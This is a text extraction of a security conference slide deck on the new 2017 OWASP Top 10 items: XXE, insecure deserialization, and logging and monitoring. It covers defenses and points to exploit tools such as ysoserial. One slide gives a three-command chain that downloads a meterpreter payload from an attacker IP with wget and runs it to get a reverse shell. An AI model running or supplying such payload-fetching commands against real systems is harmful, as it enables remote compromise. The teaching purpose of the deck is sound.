New OWASP Top 10 Items 2017 Stephen Deck GSE OSCE CISSP rangercha BE INFORMED BE STRATEGIC BE SECURE Objective OWASP Top 10 Update XML eXternal Entity XXE Background XXE Defense and Attacks ID: 770954
Download Presentation The PPT/PDF document "New OWASP Top 10 Items - 2017" is the property of its rightful owner. Permission is granted to download and print the materials on this web site for personal, non-commercial use only, and to display it on your personal computer provided you do not modify the materials and that you retain all copyright notices contained in the materials. By downloading content from our website, you accept the terms of this agreement.
New OWASP Top 10 Items - 2017 Stephen Deck, GSE, OSCE, CISSP @ranger_cha BE INFORMED. BE STRATEGIC. BE SECURE.
Objective OWASP Top 10 UpdateXML eXternal Entity (XXE) BackgroundXXE Defense and AttacksDeserialization BackgroundDeserialization Defense and AttacksNew Deserialization ResearchLogging & Monitoring 2
2017 OWASP Top 10
OWASP Top 10 2017 4 Source: https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf
XML eXternal Entity (XXE)
What is XXE? XML eXternal Entity (XXE) XML is not just for data storagePossible to supply Document Type Definition (DTD)Use DTD to create programmatic elementsRefer to these elements in the XMLOften the defaultCode execution MAY be possible 6
XXE Defenses Do not allow DTDIn PHP, do not allow expect Maybe don’t use PHP?That’s pretty much it.7
XML Format 8
XML POST 9
XML with an External Entity 10
XML with an External Entity 11
Insecure Deserialization
Serialization from the beginning… What is an object?Collection of values that works as a single unit 13
Serialization from the beginning… Process of preparing objects for storage or network transportAlso called marshallingWhat does serialization look like? 14 Source: https://www.javaworld.com/article/2072752/the-java-serialization-algorithm-revealed.html
Deserialization Deserialization is the reverse of serializationUsually from a readObject call (in Java)Common in many languagesForce server to load an unexpected objectOften execute arbitrary code 15
Malicious Objects 16 Source: https://adamcaudill.com/2017/10/04/exploiting-jackson-rce-cve-2017-7525/
Deserialization How do you fix it? Upgrade for…Blacklisting???NoooooHard to write signatures 17
Pickle Deserialization https://blog.nelhage.com/2011/03/exploiting-pickle/ Look for deserialization calls18
Pickle Deserialization Exploit Class Create a class that executes code when created 19
Pickle Send Exploit Send exploit to serverHow depends on the app 20
Deserialization in Java Look for raw Java objectsFind a suitable gadget (object to run code when loaded) Must be an object the app understandsYsoserial provides several gadgetshttps://github.com/frohoff/ysoserial 21
Deserialization in Java Vulnerable app https://github.com/hvqzao/java-deserialize-webappIncludes Apache Commons CollectionYsoserial exploit only runs one command Reverse shell in three commands wget IP/ meterpreter chmod +x meterpreter ./ meterpreter 22
Deserialization in Java Example 23
Deserialization in Java Example 24
Deserialization in Java Example 25
Deserialization in Java Example 26
No Java Objects? Safe without Java objects?Moar gadgetshttps://github.com/mbechler/marshalsecSame idea, different formatJSON, XML 27
Jackson Deserialization 28
Jackson Deserialization 29
Jackson Deserialization 30
Jackson Deserialization 31
Insufficient Logging and Monitoring
Insufficient Logging & Monitoring Ensure defenders can:Identify attacks Investigate incidents191 days to identify a breach Requires blue team participationKind of awkward for AppSec testing Cannot run 0 involvement “Top 10” test 33 Source: https://www-01.ibm.com/common/ssi/cgi-bin/ssialias?htmlfid=SEL03130WWEN&
Insufficient Logging & Monitoring Things to logFailed & successful authentication attempts Software errorsSecurity tool alertsSensitive actions (money transfers, password changes)Logs must be aggregatedBlue teams should alert 34
Summary OWASP Top 10 now includes three new vulns XXEDeserializationInsufficient Logging & MonitoringFix XXE by disallowing DTDs“Fix” Deserialization by blacklisting classes (need patch) Fix logging and monitoring by… logging and monitoring Need client support to test 35
References New OWASP Top 10 (2017)https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf Example XXE Apphttps://github.com/jbarone/xxelabSetup RMI Objecthttp://zerothoughts.tumblr.com/post/137769010389/fun-with-jndi-remote-code-injection 36
References Deserialization Resources https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet/blob/master/README.mdMarshalling Pickleshttp://frohoff.github.io/appseccali-marshalling-pickles/ysoserial https://github.com/frohoff/ysoserial Deserialization – Different marshallers https://github.com/mbechler/marshalsec 37
References Pickle Deserializationhttps://blog.nelhage.com/2011/03/exploiting-pickle/ Java Deserialization apphttps://github.com/hvqzao/java-deserialize-webappJackson Deserializationhttps://adamcaudill.com/2017/10/04/exploiting-jackson-rce-cve-2017-7525/ 38
Questions? 39
www.directdefense.com